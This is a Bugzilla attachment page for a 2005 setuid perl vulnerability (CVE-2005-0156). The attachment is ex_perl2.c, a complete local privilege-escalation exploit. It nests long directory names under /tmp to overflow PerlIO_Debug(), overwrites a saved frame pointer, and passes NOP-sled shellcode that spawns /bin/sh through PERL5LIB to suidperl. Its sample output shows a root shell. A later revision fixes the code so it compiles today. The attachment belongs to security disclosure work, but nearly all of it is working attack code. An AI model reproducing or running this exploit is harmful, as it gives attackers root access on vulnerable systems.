Bugzilla – Attachment 28127 Details for
Bug 65354
VUL-0: CVE-2005-0156: 2 setuid perl problems
ex_perl2.c
ex_perl2.c (text/plain), 3.85 KB, created by
Marcus Meissner
on 2005-02-02 19:48:44 UTC
Description:
ex_perl2.c
Filename:
MIME Type:
Creator:
Marcus Meissner
Created:
2005-02-02 19:48:44 UTC
Size:
3.85 KB
patch
obsolete
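/*
 * Copyright Kevin Finisterre
 *
 * Setuid perl PerlIO_Debug() overflow  (CVE-2005-0156, bug 65354)
 *
 * Historical proof-of-concept, kept for the record.  It nests a handful of
 * very long directory names under /tmp so that the working directory is over
 * 1 KB long, makes the last path component carry three copies of a saved
 * frame-pointer value, drops a one-line suidperl script there, and execs it
 * with PERLIO_DEBUG and PERL5LIB set (PERL5LIB holds the shellcode).  The
 * frame-pointer value (0xbffffb6a, labelled "frame 11 ebp" by the author)
 * and the interpreter path /usr/bin/sperl5.8.4 are fixed constants taken from
 * the author's 2005 machine; nothing is probed or adjusted at run time.
 *
 * This revision only fixes C-level defects of the original listing: the wrong
 * main() signature, the use of putLong() before its declaration (a hard error
 * with current compilers), an uninitialised buffer that strcat() scanned, an
 * unsigned-char array passed where a C string is expected, and syscalls whose
 * failure was silently ignored.  Payload, addresses and environment are
 * byte-for-byte those of the original.
 *
 * cc -o ex_perl2 ex_perl2.c -std=c99
 *
 * kfinisterre@jdam:~$ ./ex_perl2
 * Dirlen: 1052
 * sh-2.05b# id
 * uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
 */

/* Must precede every include: with -std=c99/-std=c11 glibc otherwise hides
 * setenv() and friends, leaving them implicitly declared. */
#define _POSIX_C_SOURCE 200809L

#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <strings.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

enum {
    PAD_LEN        = 23,   /* 'A' bytes in the last component before the ebp copies */
    FILLER_LEVELS  = 4,    /* how many times `filler` is nested */
    FILLER_COUNT   = 256,  /* bytes credited to each level in the "Dirlen" arithmetic */
    TMP_PREFIX_LEN = 5     /* strlen("/tmp/"), the starting value of "Dirlen" */
};

/*
 * Report the failing step via perror() and exit.
 *
 * Every step below either changes the filesystem or moves the process into
 * a new directory, so continuing after a failure would run the later steps
 * in the wrong place; the original listing ignored all of these results.
 */
static void die(const char *what)
{
    perror(what);
    exit(EXIT_FAILURE);
}

/*
 * Store the low 32 bits of `value` at `ptr` as four little-endian bytes
 * (IA-32 pointer width) and return the position just past them.
 *
 * `value` is widened to unsigned long first so the right shifts are
 * well-defined for negative input; bits above 31 are discarded.
 */
char *putLong(char *ptr, long value)
{
    unsigned long v = (unsigned long)value;

    for (int i = 0; i < 4; i++) {
        *ptr++ = (char)((v >> (8 * i)) & 0xff);
    }
    return ptr;
}

int main(void)
{
    /* One directory level: a run of 'A' followed by '/'.  Nested
     * FILLER_LEVELS times it makes the cwd long enough for the overflow. */
    static const char filler[] =
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/";

    /*
     * 0xff-less execve() /bin/sh by anathema <anathema@hack.co.za>
     * Linux/IA32 0xff-less execve() shellcode, behind a NOP sled.
     *
     * It is handed to suidperl as the value of PERL5LIB, i.e. as a C string
     * through setenv(), so it must not contain a 0x00 byte.
     */
    static const char code[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x89\xe6"             /* movl %esp, %esi */
        "\x83\xc6\x30"         /* addl $0x30, %esi */
        "\xb8\x2e\x62\x69\x6e" /* movl $0x6e69622e, %eax */
        "\x40"                 /* incl %eax */
        "\x89\x06"             /* movl %eax, (%esi) */
        "\xb8\x2e\x73\x68\x21" /* movl $0x2168732e, %eax */
        "\x40"                 /* incl %eax */
        "\x89\x46\x04"         /* movl %eax, 0x04(%esi) */
        "\x29\xc0"             /* subl %eax, %eax */
        "\x88\x46\x07"         /* movb %al, 0x07(%esi) */
        "\x89\x76\x08"         /* movl %esi, 0x08(%esi) */
        "\x89\x46\x0c"         /* movl %eax, 0x0c(%esi) */
        "\xb0\x0b"             /* movb $0x0b, %al */
        "\x87\xf3"             /* xchgl %esi, %ebx */
        "\x8d\x4b\x08"         /* leal 0x08(%ebx), %ecx */
        "\x8d\x53\x0c"         /* leal 0x0c(%ebx), %edx */
        "\xcd\x80";            /* int $0x80 */

    /* The script suidperl is asked to run; only the #! line matters.  The
     * interpreter path is hard-coded to the author's install. */
    static const char perldummyfile[] =
        "#!/usr/bin/sperl5.8.4\n"
        "# \n"
        "# Be proud that perl(1) may proclaim: \n"
        "# Setuid Perl scripts are safer than C programs ...\n"
        "# Do not abandon (deprecate) suidperl. Do not advocate C wrappers. \n";

    /* Last path component.  Zero-filled so that its end is well-defined:
     * the original left the tail uninitialised and let strcat() scan it. */
    char tmp[256] = {0};
    char cwd[10000] = {0};
    char malpath[10000] = {0};
    int count = TMP_PREFIX_LEN;   /* reported as "Dirlen" */

    if (chdir("/tmp/") != 0)
        die("chdir /tmp");

    for (int level = 0; level < FILLER_LEVELS; level++) {
        /* EEXIST just means a previous run already built this level. */
        if (mkdir(filler, 0777) != 0 && errno != EEXIST)
            die("mkdir filler");
        if (chdir(filler) != 0)
            die("chdir filler");
        count += FILLER_COUNT;
    }

    /* PAD_LEN bytes of 'A', then the saved-ebp value three times, then '/'.
     * The value is the original's constant; it is not derived from anything
     * on the running system. */
    memset(tmp, 0x41, PAD_LEN);
    count += PAD_LEN;

    char *ptr = tmp + PAD_LEN;
    ptr = putLong(ptr, 0xbffffb6a);   /* frame 11 ebp */
    ptr = putLong(ptr, 0xbffffb6a);
    ptr = putLong(ptr, 0xbffffb6a);
    *ptr++ = '/';
    *ptr = '\0';

    if (mkdir(tmp, 0777) != 0 && errno != EEXIST)
        die("mkdir tmp");
    if (chdir(tmp) != 0)
        die("chdir tmp");

    printf("Dirlen: %d\n", count);

    FILE *perlsploit = fopen("take_me.pl", "w+");
    if (perlsploit == NULL)
        die("fopen take_me.pl");
    /* sizeof - 1: do not write the terminating NUL into the script. */
    if (fwrite(perldummyfile, sizeof perldummyfile - 1, 1, perlsploit) != 1)
        die("fwrite take_me.pl");
    if (fclose(perlsploit) != 0)
        die("fclose take_me.pl");

    /* Absolute path of the script, built with a bounds check instead of the
     * original's unchecked strcat() chain. */
    if (getcwd(cwd, sizeof cwd) == NULL)
        die("getcwd");
    int n = snprintf(malpath, sizeof malpath, "%s/take_me.pl", cwd);
    if (n < 0 || (size_t)n >= sizeof malpath) {
        fputs("script path too long\n", stderr);
        return EXIT_FAILURE;
    }

    if (chmod(malpath, 0755) != 0)
        die("chmod take_me.pl");
    if (setenv("PERLIO_DEBUG", "/tmp/ninjitsu", 1) != 0)
        die("setenv PERLIO_DEBUG");
    if (setenv("PERL5LIB", code, 1) != 0)
        die("setenv PERL5LIB");

    /* The original passes a NULL argv.  POSIX requires at least argv[0];
     * Linux accepts NULL (argc == 0).  Presumably the hard-coded ebp value
     * was taken with exactly this layout, so it is kept rather than fixed —
     * only the cast is corrected to the parameter's type. */
    execv(malpath, (char *const *)NULL);
    die("execv");
    return EXIT_FAILURE;
}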